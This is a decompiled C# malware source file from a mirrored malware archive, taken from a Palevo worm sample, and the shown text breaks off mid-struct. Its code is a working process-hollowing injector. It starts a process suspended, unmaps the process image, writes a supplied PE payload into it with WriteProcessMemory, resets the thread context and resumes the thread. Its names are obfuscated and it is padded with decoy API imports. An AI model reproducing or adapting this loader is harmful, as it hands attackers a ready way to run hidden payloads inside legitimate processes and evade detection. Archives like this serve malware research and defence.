mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-09 11:55:29 +00:00
633 lines
25 KiB
C#
633 lines
25 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: buffy
|
|||
|
// Assembly: cfncfn, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: FB49D006-E728-4466-8E0B-8E492F910A2A
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
public class buffy
|
|||
|
{
|
|||
|
public const long ASDFASFASF = 2778;
|
|||
|
public const long FASFASFASF = 60116;
|
|||
|
public const long AFSFASFASCFC = 218;
|
|||
|
public const long ASDASCASDASD = 218;
|
|||
|
public const long BVCXBXCBXCB = 218;
|
|||
|
public const long BXCBXCBXCB = 253;
|
|||
|
public const long FSDR3FSF = 218;
|
|||
|
public const long KKKKKKKKKDDDDDDD = 17247;
|
|||
|
public const uint FSSSSSSSSSSSSSSSSSS = 218;
|
|||
|
|
|||
|
public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
|
|||
|
{
|
|||
|
object Instance1 = (object) new buffy.Context();
|
|||
|
object obj1 = (object) new buffy.Process_Information();
|
|||
|
object obj2 = (object) new buffy.Startup_Information();
|
|||
|
object obj3 = (object) new buffy.Security_Flags();
|
|||
|
object obj4 = (object) new buffy.Security_Flags();
|
|||
|
object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
|
|||
|
int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
|
|||
|
buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
|
|||
|
Type Type = typeof (Marshal);
|
|||
|
object[] objArray1 = new object[2];
|
|||
|
object[] objArray2 = objArray1;
|
|||
|
object Instance3 = Instance2;
|
|||
|
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
|
|||
|
objArray2[0] = objectValue;
|
|||
|
objArray1[1] = (object) dosHeader1.GetType();
|
|||
|
object[] objArray3 = objArray1;
|
|||
|
object[] Arguments = objArray3;
|
|||
|
bool[] flagArray = new bool[2]{ true, false };
|
|||
|
bool[] CopyBack = flagArray;
|
|||
|
object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
|
|||
|
if (flagArray[0])
|
|||
|
NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
|
|||
|
{
|
|||
|
RuntimeHelpers.GetObjectValue(objArray3[0])
|
|||
|
}, (string[]) null, (Type[]) null, true, false);
|
|||
|
buffy.DOS_Header dosHeader2;
|
|||
|
buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
|
|||
|
NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
|
|||
|
buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
|
|||
|
buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
|
|||
|
buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
|
|||
|
buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
|
|||
|
buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
|
|||
|
buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
|
|||
|
buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
|
|||
|
buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
|
|||
|
buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
|
|||
|
string DASDAS3E2_1 = VVVVVVCAE;
|
|||
|
object obj6 = obj3;
|
|||
|
buffy.Security_Flags securityFlags1;
|
|||
|
buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
|
|||
|
ref buffy.Security_Flags local1 = ref securityFlags2;
|
|||
|
object obj7 = obj4;
|
|||
|
buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
|
|||
|
ref buffy.Security_Flags local2 = ref securityFlags3;
|
|||
|
IntPtr num1;
|
|||
|
IntPtr DSA43R3W1 = num1;
|
|||
|
object obj8 = obj2;
|
|||
|
buffy.Startup_Information startupInformation1;
|
|||
|
buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
|
|||
|
ref buffy.Startup_Information local3 = ref startupInformation2;
|
|||
|
object obj9 = obj1;
|
|||
|
buffy.Process_Information processInformation1;
|
|||
|
buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
|
|||
|
ref buffy.Process_Information local4 = ref processInformation2;
|
|||
|
int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
|
|||
|
object obj10 = (object) processInformation2;
|
|||
|
object Instance4 = (object) startupInformation2;
|
|||
|
object obj11 = (object) securityFlags3;
|
|||
|
object obj12 = (object) securityFlags2;
|
|||
|
if (-((uint) num2 > 0U ? 1 : 0) == 0)
|
|||
|
return;
|
|||
|
buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
|
|||
|
IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
|
|||
|
object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
|
|||
|
buffy.NT_Headers ntHeaders2;
|
|||
|
buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
|
|||
|
NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
|
|||
|
{
|
|||
|
(object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
|
|||
|
}, (string[]) null, (Type[]) null);
|
|||
|
NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
|
|||
|
{
|
|||
|
(object) 65539
|
|||
|
}, (string[]) null, (Type[]) null);
|
|||
|
if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
|
|||
|
return;
|
|||
|
buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
|
|||
|
string DASDAS3E2_2 = VVVVVVCAE;
|
|||
|
object obj13 = obj12;
|
|||
|
securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
|
|||
|
ref buffy.Security_Flags local5 = ref securityFlags2;
|
|||
|
object obj14 = obj11;
|
|||
|
securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
|
|||
|
ref buffy.Security_Flags local6 = ref securityFlags3;
|
|||
|
IntPtr DSA43R3W2 = num1;
|
|||
|
object obj15 = Instance4;
|
|||
|
startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
|
|||
|
ref buffy.Startup_Information local7 = ref startupInformation2;
|
|||
|
object obj16 = obj10;
|
|||
|
processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
|
|||
|
ref buffy.Process_Information local8 = ref processInformation2;
|
|||
|
int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
|
|||
|
object Instance5 = (object) processInformation2;
|
|||
|
object obj17 = (object) startupInformation2;
|
|||
|
object obj18 = (object) securityFlags3;
|
|||
|
object obj19 = (object) securityFlags2;
|
|||
|
if (-((uint) num3 > 0U ? 1 : 0) == 0)
|
|||
|
return;
|
|||
|
buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
|
|||
|
object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
|
|||
|
object obj21 = Instance1;
|
|||
|
buffy.Context context1;
|
|||
|
buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
|
|||
|
ref buffy.Context local9 = ref context2;
|
|||
|
int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
|
|||
|
object Instance6 = (object) context2;
|
|||
|
buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
|
|||
|
object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
|
|||
|
int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
|
|||
|
long num5;
|
|||
|
int num6 = checked ((int) num5);
|
|||
|
ref int local10 = ref num6;
|
|||
|
int num7 = 0;
|
|||
|
ref int local11 = ref num7;
|
|||
|
int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
|
|||
|
long num9 = (long) num6;
|
|||
|
buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
|
|||
|
object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
|
|||
|
int AL8ZCRFWNU1 = checked ((int) num9);
|
|||
|
long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
|
|||
|
buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
|
|||
|
object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
|
|||
|
int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
|
|||
|
int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
|
|||
|
uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
|
|||
|
if (num11 == 0U)
|
|||
|
return;
|
|||
|
buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
|
|||
|
object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
|
|||
|
int AL8ZCRFWNU2 = checked ((int) num11);
|
|||
|
byte[] DSAE32_1 = DAS4DA3;
|
|||
|
int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
|
|||
|
uint num12;
|
|||
|
int num13 = checked ((int) num12);
|
|||
|
ref int local12 = ref num13;
|
|||
|
int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
|
|||
|
uint num15 = checked ((uint) num13);
|
|||
|
long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
|
|||
|
int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
|
|||
|
int num18 = 0;
|
|||
|
while (num18 <= num17)
|
|||
|
{
|
|||
|
ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
|
|||
|
buffy.Section_Header sectionHeader1;
|
|||
|
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
|
|||
|
buffy.Section_Header sectionHeader2;
|
|||
|
sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
|
|||
|
byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
|
|||
|
int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
|
|||
|
int index = 0;
|
|||
|
while (index <= num19)
|
|||
|
{
|
|||
|
numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
|
|||
|
object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
|
|||
|
int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
|
|||
|
byte[] DSAE32_2 = numArray;
|
|||
|
int da22S3 = checked ((int) sectionHeader1.DA22S3);
|
|||
|
int num20 = checked ((int) num15);
|
|||
|
ref int local13 = ref num20;
|
|||
|
int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
|
|||
|
num15 = checked ((uint) num20);
|
|||
|
checked { ++num18; }
|
|||
|
}
|
|||
|
object bytes = (object) BitConverter.GetBytes(num11);
|
|||
|
buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
|
|||
|
object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
|
|||
|
int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
|
|||
|
byte[] DSAE32_3 = (byte[]) bytes;
|
|||
|
int num22 = checked ((int) num15);
|
|||
|
ref int local14 = ref num22;
|
|||
|
int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
|
|||
|
num12 = checked ((uint) num22);
|
|||
|
NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
|
|||
|
{
|
|||
|
(object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
|
|||
|
}, (string[]) null, (Type[]) null);
|
|||
|
buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
|
|||
|
object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
|
|||
|
object obj29 = Instance6;
|
|||
|
context2 = obj29 != null ? (buffy.Context) obj29 : context1;
|
|||
|
ref buffy.Context local15 = ref context2;
|
|||
|
int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
|
|||
|
object obj30 = (object) context2;
|
|||
|
buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
|
|||
|
object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
|
|||
|
IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
|
|||
|
int num25 = (int) ws2XvbnvO9_2(DASEAS);
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
|
|||
|
|
|||
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
|
|||
|
|
|||
|
[DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long RpcNsProfileEltAdd(
|
|||
|
long ProfileNameSyntax,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
|
|||
|
ref IntPtr IfId,
|
|||
|
long MemberNameSyntax,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
|
|||
|
long Priority,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
|
|||
|
|
|||
|
[DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
|
|||
|
|
|||
|
[DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
|
|||
|
|
|||
|
[DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long MgmGetNextMfeStats(
|
|||
|
ref IntPtr pimmStart,
|
|||
|
ref long pdwBufferSize,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
|
|||
|
ref long pdwNumEntries);
|
|||
|
|
|||
|
[DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long MprAdminDeviceEnum(
|
|||
|
ref IntPtr hMprServer,
|
|||
|
long dwLevel,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
|
|||
|
ref long lpdwTotalEntries);
|
|||
|
|
|||
|
[DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long MsiDatabaseImport(
|
|||
|
ref IntPtr hDatabase,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
|
|||
|
|
|||
|
[DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
|
|||
|
|
|||
|
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
|
|||
|
|
|||
|
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long NetReplExportDirSetInfo(
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
|
|||
|
long level,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
|
|||
|
ref long parm_err);
|
|||
|
|
|||
|
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long NetUseGetInfo(
|
|||
|
ref IntPtr UncServerName,
|
|||
|
ref IntPtr UseName,
|
|||
|
long level,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long ReadConsoleInput(
|
|||
|
long hConsoleInput,
|
|||
|
ref IntPtr lpBuffer,
|
|||
|
long nLength,
|
|||
|
ref long lpNumberOfEventsRead);
|
|||
|
|
|||
|
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
|
|||
|
|
|||
|
[DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long SnmpMgrCtl(
|
|||
|
ref IntPtr session,
|
|||
|
long dwCtlCode,
|
|||
|
ref long lpvInBuffer,
|
|||
|
long cbInBuffer,
|
|||
|
ref long lpvOUTBuffer,
|
|||
|
long cbOUTBuffer,
|
|||
|
ref long lpcbBytesReturned);
|
|||
|
|
|||
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long AddAuditAccessAceEx(
|
|||
|
IntPtr pAcl,
|
|||
|
long dwAceRevision,
|
|||
|
long AceFlags,
|
|||
|
long dwAccessMask,
|
|||
|
ref IntPtr pSid,
|
|||
|
long bAuditSuccess,
|
|||
|
long bAuditFailure);
|
|||
|
|
|||
|
[DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long SQLInstallerError(
|
|||
|
int iError,
|
|||
|
ref long pfErrorCode,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
|
|||
|
int cbErrorMsgMax,
|
|||
|
ref int pcbErrorMsg);
|
|||
|
|
|||
|
[DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
|
|||
|
|
|||
|
[DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long RasSetCredentials(
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
|
|||
|
ref IntPtr TLPRASCREDENTIALSA,
|
|||
|
long @bool);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long ReadConsole(
|
|||
|
long hConsoleInput,
|
|||
|
ref long lpBuffer,
|
|||
|
long nNumberOfCharsToRead,
|
|||
|
ref long lpNumberOfCharsRead,
|
|||
|
ref long lpReserved);
|
|||
|
|
|||
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long ReadEncryptedFileRaw(
|
|||
|
ref IntPtr pfExportCallback,
|
|||
|
ref long pvCallbackContext,
|
|||
|
ref long pvContext);
|
|||
|
|
|||
|
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long ReadPrinter(
|
|||
|
long hPrinter,
|
|||
|
ref long pBuf,
|
|||
|
long cdBuf,
|
|||
|
ref long pNoBytesRead);
|
|||
|
|
|||
|
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long ReleaseSemaphore(
|
|||
|
long hSemaphore,
|
|||
|
long lReleaseCount,
|
|||
|
ref long lpPreviousCount);
|
|||
|
|
|||
|
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long GetStringTypeEx(
|
|||
|
long Locale,
|
|||
|
long dwInfoType,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
|
|||
|
long cchSrc,
|
|||
|
ref int lpCharType);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long GetVolumePathName(
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
|
|||
|
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
|
|||
|
long cchBufferLength);
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
|
|||
|
|
|||
|
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern IntPtr ToAscii(
|
|||
|
long uVirtKey,
|
|||
|
long uScanCode,
|
|||
|
ref byte lpbKeyState,
|
|||
|
ref long lpwTransKey,
|
|||
|
long fuState);
|
|||
|
|
|||
|
private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
|
|||
|
|
|||
|
public struct Context
|
|||
|
{
|
|||
|
public uint II69TOHMUR;
|
|||
|
public uint d2;
|
|||
|
public uint das;
|
|||
|
public uint d9;
|
|||
|
public uint ad;
|
|||
|
public uint dsa;
|
|||
|
public uint ds;
|
|||
|
public buffy.Save Save;
|
|||
|
public uint dh;
|
|||
|
public uint sad;
|
|||
|
public uint da;
|
|||
|
public uint MD;
|
|||
|
public uint RD;
|
|||
|
public uint mSI;
|
|||
|
public uint WDA;
|
|||
|
public uint AD3;
|
|||
|
public uint D21;
|
|||
|
public uint AS4;
|
|||
|
public uint K32;
|
|||
|
public uint F2W;
|
|||
|
public uint HHJ;
|
|||
|
public uint ADF5;
|
|||
|
public uint GSSA;
|
|||
|
public uint DSAAA;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|||
|
public byte[] er6rgdr65;
|
|||
|
}
|
|||
|
|
|||
|
public struct Save
|
|||
|
{
|
|||
|
public uint KD7JX2MXT;
|
|||
|
public uint JCNS3ZPSXO;
|
|||
|
public uint DAS3;
|
|||
|
public uint DAS23;
|
|||
|
public uint ADSA;
|
|||
|
public uint DAF35;
|
|||
|
public uint FA32D;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|||
|
public byte[] FSDRF43;
|
|||
|
public uint FA32QA;
|
|||
|
}
|
|||
|
|
|||
|
public struct Misc
|
|||
|
{
|
|||
|
public uint SDUHRL;
|
|||
|
public uint GSIJ;
|
|||
|
}
|
|||
|
|
|||
|
public struct Section_Header
|
|||
|
{
|
|||
|
public byte FSDPOU4PO3;
|
|||
|
public buffy.Misc Mi2sc;
|
|||
|
public uint AL8ZCRFWNU;
|
|||
|
public uint DA22S3;
|
|||
|
public uint PoinEEter;
|
|||
|
public uint E2Q4RS;
|
|||
|
public uint FS523QF;
|
|||
|
public uint FSB43FSD4;
|
|||
|
public uint QBFAS4E;
|
|||
|
public uint AS32QFZS;
|
|||
|
}
|
|||
|
|
|||
|
public struct Process_Information
|
|||
|
{
|
|||
|
public IntPtr DAS4QQW;
|
|||
|
public IntPtr RFSER;
|
|||
|
public int TGJWE;
|
|||
|
public int SDFFFFFFFFFF;
|
|||
|
}
|
|||
|
|
|||
|
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
|||
|
public struct Startup_Information
|
|||
|
{
|
|||
|
public int CSZE;
|
|||
|
public string FSDR4G;
|
|||
|
public string AAAAAAAAAA;
|
|||
|
public string AADDDDDDD;
|
|||
|
public int ADA;
|
|||
|
public int C;
|
|||
|
public int AEDS;
|
|||
|
public int DASDDDD;
|
|||
|
public int XASE4;
|
|||
|
public int DAS3EDFZ;
|
|||
|
public int DVA3ES;
|
|||
|
public int CCCCQ;
|
|||
|
public short FDSRS;
|
|||
|
public short VYE5X;
|
|||
|
public int KHJKIHJK;
|
|||
|
public int KHJKHJK;
|
|||
|
public int KHJKHJ;
|
|||
|
public int KHJKJHK;
|
|||
|
}
|
|||
|
|
|||
|
public struct Security_Flags
|
|||
|
{
|
|||
|
public int GFSETWE;
|
|||
|
public IntPtr EWEWWW;
|
|||
|
public int DASDAS;
|
|||
|
}
|
|||
|
|
|||
|
public struct DOS_Header
|
|||
|
{
|
|||
|
public ushort DASDASFASF;
|
|||
|
public ushort QWEQWE;
|
|||
|
public ushort EQWEQWEQWE;
|
|||
|
public ushort HFGHFGHFGH;
|
|||
|
public ushort HFGHFGHFG;
|
|||
|
public ushort DASD444444;
|
|||
